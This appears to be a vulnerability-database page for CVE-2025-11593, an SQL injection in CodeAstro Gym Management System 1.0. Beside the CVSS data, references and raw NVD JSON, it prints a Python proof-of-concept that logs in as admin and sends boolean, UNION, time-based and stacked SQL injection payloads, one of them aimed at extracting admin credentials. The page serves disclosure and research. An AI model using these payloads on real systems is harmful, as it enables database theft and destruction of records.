CVE-2025-11593

Description

A flaw has been found in CodeAstro Gym Management System 1.0. This vulnerability affects unknown code of the file /admin/actions/delete-equipment.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11593 - CodeAstro Gym Management System SQL Injection PoC
# Vulnerability: SQL Injection in /admin/actions/delete-equipment.php via ID parameter
# Author: Security Researcher

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
ADMIN_LOGIN_URL = f"{TARGET_URL}/admin/"
DELETE_EQUIPMENT_URL = f"{TARGET_URL}/admin/actions/delete-equipment.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin (low privilege required)
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(ADMIN_LOGIN_URL, data=login_data)

# Step 2: Exploit SQL Injection via ID parameter
# Example 1: Boolean-based blind SQL injection to extract data
sqli_payload = "1' OR '1'='1"
params = {
    "ID": sqli_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] Response status: {response.status_code}")
print(f"[+] Response length: {len(response.text)}")

# Example 2: UNION-based SQL injection to extract database information
union_payload = "1' UNION SELECT 1,2,3,4,5-- -"
params = {
    "ID": union_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] UNION injection response: {response.text[:500]}")

# Example 3: Time-based blind SQL injection
time_payload = "1' AND SLEEP(5)-- -"
params = {
    "ID": time_payload
}
import time
start_time = time.time()
response = session.get(DELETE_EQUIPMENT_URL, params=params)
elapsed_time = time.time() - start_time
print(f"[+] Time-based injection elapsed: {elapsed_time:.2f} seconds")

# Example 4: Stacked queries - extract admin credentials
stacked_payload = "1'; SELECT username, password FROM admins-- -"
params = {
    "ID": stacked_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] Stacked queries response: {response.text[:500]}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11593
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11593
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11593/
[4] VulDB https://vuldb.com/cve/CVE-2025-11593
[5] https://codeastro.com/
[6] https://github.com/coppeliaz/cve/issues/6
[7] https://vuldb.com/?ctiid.327914
[8] https://vuldb.com/?id.327914
[9] https://vuldb.com/?submit.671741
[10] https://github.com/coppeliaz/cve/issues/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11593", "sourceIdentifier": "[email protected]", "published": "2025-10-11T07:15:37.947", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in CodeAstro Gym Management System 1.0. This vulnerability affects unknown code of the file /admin/actions/delete-equipment.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coppeliaz/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327914", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327914", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671741", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coppeliaz/cve/issues/6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}